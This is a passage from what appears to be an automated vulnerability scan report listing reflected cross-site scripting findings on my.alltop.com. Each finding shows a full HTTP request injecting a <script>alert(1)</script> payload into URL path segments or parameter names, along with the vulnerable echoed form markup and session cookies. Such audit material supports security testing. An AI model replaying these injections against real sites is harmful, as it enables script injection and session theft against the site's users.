Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:15 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:16 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:16 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/w'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F8)%3C/script%3E?46d5b"><script>alert(1)</script>ad51198bb33=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.235. http://my.alltop.com/alpha/w/%22ns=%22netsparker(0x0001FA) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/w/%22ns=%22netsparker(0x0001FA)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65b41"><script>alert(1)</script>571fbeb32e3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/w65b41"><script>alert(1)</script>571fbeb32e3/%22ns=%22netsparker(0x0001FA) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:10 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:10 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:10 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/w65b41"><script>alert(1)</script>571fbeb32e3/%22ns=%22netsparker(0x0001FA)" method="post" accept-charset="utf-8">
...[SNIP]...

1.236. http://my.alltop.com/alpha/w/%22ns=%22netsparker(0x0001FA) [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/w/%22ns=%22netsparker(0x0001FA)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8215"><script>alert(1)</script>0bde3212027 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/w/%22nsc8215"><script>alert(1)</script>0bde3212027=%22netsparker(0x0001FA) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:13 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:14 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:14 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/w/%22nsc8215"><script>alert(1)</script>0bde3212027=%22netsparker(0x0001FA)" method="post" accept-charset="utf-8">
...[SNIP]...

1.237. http://my.alltop.com/alpha/w/%22ns=%22netsparker(0x0001FA) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/w/%22ns=%22netsparker(0x0001FA)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50c1a"><script>alert(1)</script>145d22cac47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/w/%22ns=%22netsparker(0x0001FA)?50c1a"><script>alert(1)</script>145d22cac47=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:05 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:07 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:07 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/w/%22ns=%22netsparker(0x0001FA)?50c1a"><script>alert(1)</script>145d22cac47=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.238. http://my.alltop.com/alpha/w/%2522ns%253D%2522netsparker%25280x0001FE%2529) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/w/%2522ns%253D%2522netsparker%25280x0001FE%2529)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e2ac"><script>alert(1)</script>d5a39b1a380 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/w6e2ac"><script>alert(1)</script>d5a39b1a380/%2522ns%253D%2522netsparker%25280x0001FE%2529) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:11 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:11 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:11 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/w6e2ac"><script>alert(1)</script>d5a39b1a380/%2522ns%253D%2522netsparker%25280x0001FE%2529)" method="post" accept-charset="utf-8">
...[SNIP]...

1.239. http://my.alltop.com/alpha/w/%2522ns%253D%2522netsparker%25280x0001FE%2529) [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/w/%2522ns%253D%2522netsparker%25280x0001FE%2529)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87d19"><script>alert(1)</script>897597424cc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/w/%2522ns%253D%2522netsparker%25280x0001FE%2529)87d19"><script>alert(1)</script>897597424cc HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:12 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:13 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:13 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/w/%2522ns%253D%2522netsparker%25280x0001FE%2529)87d19"><script>alert(1)</script>897597424cc" method="post" accept-charset="utf-8">
...[SNIP]...

1.240. http://my.alltop.com/alpha/w/%2522ns%253D%2522netsparker%25280x0001FE%2529) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/w/%2522ns%253D%2522netsparker%25280x0001FE%2529)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d5ec"><script>alert(1)</script>238b49f1f59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/w/%2522ns%253D%2522netsparker%25280x0001FE%2529)?2d5ec"><script>alert(1)</script>238b49f1f59=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:09 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:09 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:09 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/w/%2522ns%253D%2522netsparker%25280x0001FE%2529)?2d5ec"><script>alert(1)</script>238b49f1f59=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.241. http://my.alltop.com/alpha/x [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/x

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5d00"><script>alert(1)</script>0fd5dd974c7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/xc5d00"><script>alert(1)</script>0fd5dd974c7 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:55 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:55 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:55 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/xc5d00"><script>alert(1)</script>0fd5dd974c7" method="post" accept-charset="utf-8">
...[SNIP]...

1.242. http://my.alltop.com/alpha/x [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/x

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec2bf"><script>alert(1)</script>231b2106e47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/x?ec2bf"><script>alert(1)</script>231b2106e47=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:52 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:52 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:52 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/x?ec2bf"><script>alert(1)</script>231b2106e47=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.243. http://my.alltop.com/alpha/y ['"--> parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/y

